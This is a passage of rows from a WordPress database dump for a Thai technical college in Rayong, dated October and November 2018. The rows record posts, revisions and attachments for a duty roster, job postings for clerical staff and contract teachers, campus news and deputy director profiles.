(4174, 3, '2018-10-26 14:12:13', '2018-10-26 07:12:13', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%9E%E0%B8%A4%E0%B8%A8%E0%B8%88%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A2%E0%B8%99-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนพฤศจิกายน 2561', '', 'inherit', 'closed', 'closed', '', '4172-revision-v1', '', '', '2018-10-26 14:12:13', '2018-10-26 07:12:13', '', 4172, 'http://www.technicrayong.ac.th/4172-revision-v1/', 0, 'revision', '', 0),
(4176, 3, '2018-10-30 12:56:10', '2018-10-30 05:56:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2-%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 4 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-2', '', '', '2018-10-30 15:55:01', '2018-10-30 08:55:01', '', 0, 'http://www.technicrayong.ac.th/?p=4176', 261, 'post', '', 0),
(4177, 3, '2018-10-30 12:55:50', '2018-10-30 05:55:50', '', 'รับสมัครเจ้าหน้าที่ จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b8%88%e0%b8%b3%e0%b8%99', '', '', '2018-10-30 12:55:50', '2018-10-30 05:55:50', '', 4176, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/รับสมัครเจ้าหน้าที่-จำนวน-4-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4178, 3, '2018-10-30 12:56:10', '2018-10-30 05:56:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '4176-revision-v1', '', '', '2018-10-30 12:56:10', '2018-10-30 05:56:10', '', 4176, 'http://www.technicrayong.ac.th/4176-revision-v1/', 0, 'revision', '', 0),
(4179, 3, '2018-10-30 12:59:55', '2018-10-30 05:59:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-12-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2-%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 12 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-3', '', '', '2018-10-30 15:56:55', '2018-10-30 08:56:55', '', 0, 'http://www.technicrayong.ac.th/?p=4179', 260, 'post', '', 0),
(4180, 3, '2018-10-30 12:59:41', '2018-10-30 05:59:41', '', 'รับสมัครครูอัตราจ้าง จำนวน 12 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87-%e0%b8%88%e0%b8%b3', '', '', '2018-10-30 12:59:41', '2018-10-30 05:59:41', '', 4179, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/รับสมัครครูอัตราจ้าง-จำนวน-12-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4181, 3, '2018-10-30 12:59:55', '2018-10-30 05:59:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-12-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 12 อัตรา', '', 'inherit', 'closed', 'closed', '', '4179-revision-v1', '', '', '2018-10-30 12:59:55', '2018-10-30 05:59:55', '', 4179, 'http://www.technicrayong.ac.th/4179-revision-v1/', 0, 'revision', '', 0),
(4182, 3, '2018-10-30 13:21:05', '2018-10-30 06:21:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D699630577079800%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 30 ตุลาคม 2561 ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร คณะครู บุคลากรทางการศึกษา เข้าร่วมประชุมสภากาแฟ เพื่อปรึกษาหารือในการจัดการเรียนการสอนให้สอดคล้อง และเป็นไปในทิศทางเดียวกัน ตลอดจนปัญหาต่างๆที่เกิดขึ้น ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-30-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%9c%e0%b8%b9%e0%b9%89', '', '', '2018-10-30 13:21:05', '2018-10-30 06:21:05', '', 0, 'http://www.technicrayong.ac.th/?p=4182', 259, 'post', '', 0),
(4183, 3, '2018-10-30 13:03:13', '2018-10-30 06:03:13', '', '44958963_699628187080039_6759806506998169600_o', '', 'inherit', 'closed', 'closed', '', '44958963_699628187080039_6759806506998169600_o', '', '', '2018-10-30 13:03:13', '2018-10-30 06:03:13', '', 4182, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/44958963_699628187080039_6759806506998169600_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4184, 3, '2018-10-30 13:21:05', '2018-10-30 06:21:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D699630577079800%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 30 ตุลาคม 2561 ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร คณะครู บุคลากรทางการศึกษา เข้าร่วมประชุมสภากาแฟ เพื่อปรึกษาหารือในการจัดการเรียนการสอนให้สอดคล้อง และเป็นไปในทิศทางเดียวกัน ตลอดจนปัญหาต่างๆที่เกิดขึ้น ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4182-revision-v1', '', '', '2018-10-30 13:21:05', '2018-10-30 06:21:05', '', 4182, 'http://www.technicrayong.ac.th/4182-revision-v1/', 0, 'revision', '', 0),
(4185, 3, '2018-10-30 15:54:10', '2018-10-30 08:54:10', '', 'รับสมัครเจ้าหน้าที่ จำนวน 4 อัตรา แก้ไข', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b8%88%e0%b8%b3-2', '', '', '2018-10-30 15:54:10', '2018-10-30 08:54:10', '', 4176, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/รับสมัครเจ้าหน้าที่-จำนวน-4-อัตรา-แก้ไข.pdf', 0, 'attachment', 'application/pdf', 0),
(4186, 3, '2018-10-30 15:54:55', '2018-10-30 08:54:55', '', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '4176-autosave-v1', '', '', '2018-10-30 15:54:55', '2018-10-30 08:54:55', '', 4176, 'http://www.technicrayong.ac.th/4176-autosave-v1/', 0, 'revision', '', 0),
(4187, 3, '2018-10-30 15:55:01', '2018-10-30 08:55:01', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2-%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '4176-revision-v1', '', '', '2018-10-30 15:55:01', '2018-10-30 08:55:01', '', 4176, 'http://www.technicrayong.ac.th/4176-revision-v1/', 0, 'revision', '', 0),
(4188, 3, '2018-10-30 15:56:43', '2018-10-30 08:56:43', '', 'รับสมัครครูอัตราจ้าง จำนวน 12 อัตรา แก้ไข', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87-%e0%b8%88-2', '', '', '2018-10-30 15:56:43', '2018-10-30 08:56:43', '', 4179, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/รับสมัครครูอัตราจ้าง-จำนวน-12-อัตรา-แก้ไข.pdf', 0, 'attachment', 'application/pdf', 0),
(4189, 3, '2018-10-30 15:56:55', '2018-10-30 08:56:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-12-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2-%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 12 อัตรา', '', 'inherit', 'closed', 'closed', '', '4179-revision-v1', '', '', '2018-10-30 15:56:55', '2018-10-30 08:56:55', '', 4179, 'http://www.technicrayong.ac.th/4179-revision-v1/', 0, 'revision', '', 0),
(4190, 3, '2018-10-30 16:03:14', '2018-10-30 09:03:14', '', '30-10-2561 16-05-34', '', 'inherit', 'closed', 'closed', '', '30-10-2561-16-05-34', '', '', '2018-10-30 16:03:14', '2018-10-30 09:03:14', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/30-10-2561-16-05-34.jpg', 0, 'attachment', 'image/jpeg', 0),
(4191, 3, '2018-10-30 16:03:31', '2018-10-30 09:03:31', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span>\r\n\r\n<span style=\"color: #ffffff;\">----------------------------------<img class=\"aligncenter size-full wp-image-4190\" src=\"/wp-content/uploads/2018/10/30-10-2561-16-05-34.jpg\" alt=\"\" width=\"821\" height=\"600\" />--------------------------------------------------</span>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-10-30 16:03:31', '2018-10-30 09:03:31', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(4193, 3, '2018-10-30 16:18:58', '2018-10-30 09:18:58', '<a href=\"/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%87/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%8a%e0%b8%a3%e0%b8%b4%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c-2/\"><img class=\" wp-image-12156 aligncenter\" src=\"/wp-content/uploads/2018/10/รองชรินทร์.jpg\" alt=\"\" width=\"414\" height=\"553\" /></a>', 'รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%87', '', '', '2021-11-08 10:13:49', '2021-11-08 03:13:49', '', 0, 'http://www.technicrayong.ac.th/?p=4193', 258, 'post', '', 0),
(4194, 3, '2018-10-30 16:17:17', '2018-10-30 09:17:17', '', 'ดร.ภูมิพัฒน์ แก้วมูล', '', 'inherit', 'closed', 'closed', '', '%e0%b8%94%e0%b8%a3-%e0%b8%a0%e0%b8%b9%e0%b8%a1%e0%b8%b4%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b9%8c-%e0%b9%81%e0%b8%81%e0%b9%89%e0%b8%a7%e0%b8%a1%e0%b8%b9%e0%b8%a5', '', '', '2018-10-30 16:17:17', '2018-10-30 09:17:17', '', 4193, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ดร.ภูมิพัฒน์-แก้วมูล.jpg', 0, 'attachment', 'image/jpeg', 0),
(4195, 3, '2018-10-30 16:19:56', '2018-10-30 09:19:56', '<img class=\"aligncenter wp-image-2908\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14.jpg\" alt=\"\" width=\"250\" height=\"320\" />\n<h3 style=\"text-align: center;\">นางณัฐธารีย์ สิริกุลปัญญาพร\nรองผู้อำนวยการฝ่ายบริหารทรัพยากร</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '645-autosave-v1', '', '', '2018-10-30 16:19:56', '2018-10-30 09:19:56', '', 645, 'http://www.technicrayong.ac.th/645-autosave-v1/', 0, 'revision', '', 0),
(4196, 3, '2018-10-30 16:18:58', '2018-10-30 09:18:58', '<img class=\"aligncenter wp-image-4194 size-medium\" src=\"/wp-content/uploads/2018/10/ดร.ภูมิพัฒน์-แก้วมูล-247x300.jpg\" alt=\"\" width=\"247\" height=\"300\" />\r\n<h3 style=\"text-align: center;\">ดร.ภูมิพัฒน์ แก้วมูล</h3>\r\n<h3 style=\"text-align: center;\">รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ</h3>', 'รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '4193-revision-v1', '', '', '2018-10-30 16:18:58', '2018-10-30 09:18:58', '', 4193, 'http://www.technicrayong.ac.th/4193-revision-v1/', 0, 'revision', '', 0),
(4197, 3, '2018-10-30 16:20:23', '2018-10-30 09:20:23', '<img class=\"aligncenter wp-image-2908\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14.jpg\" alt=\"\" width=\"250\" height=\"320\" />\r\n<h3 style=\"text-align: center;\">นางณัฐธารีย์ สิริกุลปัญญาพร\r\nรองผู้อำนวยการฝ่ายบริหารทรัพยากร</h3>', 'รองผู้อำนวยการฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '645-revision-v1', '', '', '2018-10-30 16:20:23', '2018-10-30 09:20:23', '', 645, 'http://www.technicrayong.ac.th/645-revision-v1/', 0, 'revision', '', 0),
(4198, 3, '2018-10-30 16:21:11', '2018-10-30 09:21:11', '<a href=\"/wp-content/uploads/2018/01/รองอานุภาพ555-1.jpg\"><img class=\"aligncenter wp-image-3945 size-medium\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-1-300x293.jpg\" alt=\"\" width=\"300\" height=\"293\" /></a>\r\n<h3 style=\"text-align: center;\">นายอานุภาพ วาสะสิริ\r\nรองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '649-revision-v1', '', '', '2018-10-30 16:21:11', '2018-10-30 09:21:11', '', 649, 'http://www.technicrayong.ac.th/649-revision-v1/', 0, 'revision', '', 0),
(4199, 3, '2018-11-02 13:23:58', '2018-11-02 06:23:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D700141957028662%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 31 ตุลาคม 2561 บริษัท สตาร์ ปิโตรเลียม รีไฟน์นิ่ง จำกัด (มหาชน) SPRC ให้ความอนุเคราะห์ เข้าปรับปรุงสภาพแวดล้อมภายในแผนกช่างกลโรงงานและเทคนิคการผลิต ซึ่งอยู่ในช่วงกำลังดำเนินการติดตั้งระบบระบายอากาศ ปรับปรุงระบบแสงสว่างภายในพื้นที่ปฏิบัติงาน ปรับปรุงสวิตช์ไฟและชุดไฟฟ้าควบคุมเครื่องจักรกล ปรับปรุงสีพื้นโรงงาน โดยคำนึงถึงหลักความปลอดภัยในการใช้พื้นที่ของคณะครู นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-31-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97', '', '', '2018-11-02 13:23:58', '2018-11-02 06:23:58', '', 0, 'http://www.technicrayong.ac.th/?p=4199', 257, 'post', '', 0),
(4200, 3, '2018-11-02 13:22:14', '2018-11-02 06:22:14', '', '45147766_700139260362265_8019026751373967360_o', '', 'inherit', 'closed', 'closed', '', '45147766_700139260362265_8019026751373967360_o', '', '', '2018-11-02 13:22:14', '2018-11-02 06:22:14', '', 4199, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/45147766_700139260362265_8019026751373967360_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4201, 3, '2018-11-02 13:23:58', '2018-11-02 06:23:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D700141957028662%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 31 ตุลาคม 2561 บริษัท สตาร์ ปิโตรเลียม รีไฟน์นิ่ง จำกัด (มหาชน) SPRC ให้ความอนุเคราะห์ เข้าปรับปรุงสภาพแวดล้อมภายในแผนกช่างกลโรงงานและเทคนิคการผลิต ซึ่งอยู่ในช่วงกำลังดำเนินการติดตั้งระบบระบายอากาศ ปรับปรุงระบบแสงสว่างภายในพื้นที่ปฏิบัติงาน ปรับปรุงสวิตช์ไฟและชุดไฟฟ้าควบคุมเครื่องจักรกล ปรับปรุงสีพื้นโรงงาน โดยคำนึงถึงหลักความปลอดภัยในการใช้พื้นที่ของคณะครู นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4199-revision-v1', '', '', '2018-11-02 13:23:58', '2018-11-02 06:23:58', '', 4199, 'http://www.technicrayong.ac.th/4199-revision-v1/', 0, 'revision', '', 0),
(4202, 3, '2019-02-26 09:06:38', '2019-02-26 02:06:38', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span>\n\n<span style=\"color: #ffffff;\">------------------------------------------------------------------------------------</span>\n\n \n\n<a href=\"/wp-content/uploads/2019/02/26-2-2562-9-04-45.png\"><img class=\"aligncenter wp-image-5275 size-full\" src=\"/wp-content/uploads/2019/02/26-2-2562-9-04-45.png\" alt=\"\" width=\"1003\" height=\"718\" /></a>\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-autosave-v1', '', '', '2019-02-26 09:06:38', '2019-02-26 02:06:38', '', 982, 'http://www.technicrayong.ac.th/982-autosave-v1/', 0, 'revision', '', 0),
(4203, 3, '2018-11-02 13:30:34', '2018-11-02 06:30:34', '', '2-11-2561 13-32-44', '', 'inherit', 'closed', 'closed', '', '2-11-2561-13-32-44', '', '', '2018-11-02 13:30:34', '2018-11-02 06:30:34', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/2-11-2561-13-32-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(4204, 3, '2018-11-02 13:30:49', '2018-11-02 06:30:49', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span>\r\n\r\n<span style=\"color: #ffffff;\">----------------------------------<img class=\"aligncenter size-full wp-image-4203\" src=\"/wp-content/uploads/2018/11/2-11-2561-13-32-44.jpg\" alt=\"\" width=\"820\" height=\"588\" />--------------------------------------------------</span>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-11-02 13:30:49', '2018-11-02 06:30:49', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(4205, 3, '2018-11-02 13:36:22', '2018-11-02 06:36:22', ' \n<h3 style=\"text-align: center;\">ดร.ภูมิพัฒน์ แก้วมูล</h3>\n<h3 style=\"text-align: center;\">รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ</h3>', 'รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '4193-autosave-v1', '', '', '2018-11-02 13:36:22', '2018-11-02 06:36:22', '', 4193, 'http://www.technicrayong.ac.th/4193-autosave-v1/', 0, 'revision', '', 0),
(4206, 3, '2018-11-02 13:36:27', '2018-11-02 06:36:27', '', '2-11-2561 13-38-39', '', 'inherit', 'closed', 'closed', '', '2-11-2561-13-38-39', '', '', '2018-11-02 13:36:27', '2018-11-02 06:36:27', '', 4193, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/2-11-2561-13-38-39.jpg', 0, 'attachment', 'image/jpeg', 0),
(4207, 3, '2018-11-02 13:36:57', '2018-11-02 06:36:57', ' \r\n<h3 style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-4206\" src=\"/wp-content/uploads/2018/10/2-11-2561-13-38-39.jpg\" alt=\"\" width=\"253\" height=\"320\" />ดร.ภูมิพัฒน์ แก้วมูล</h3>\r\n<h3 style=\"text-align: center;\">รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ</h3>', 'รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '4193-revision-v1', '', '', '2018-11-02 13:36:57', '2018-11-02 06:36:57', '', 4193, 'http://www.technicrayong.ac.th/4193-revision-v1/', 0, 'revision', '', 0),
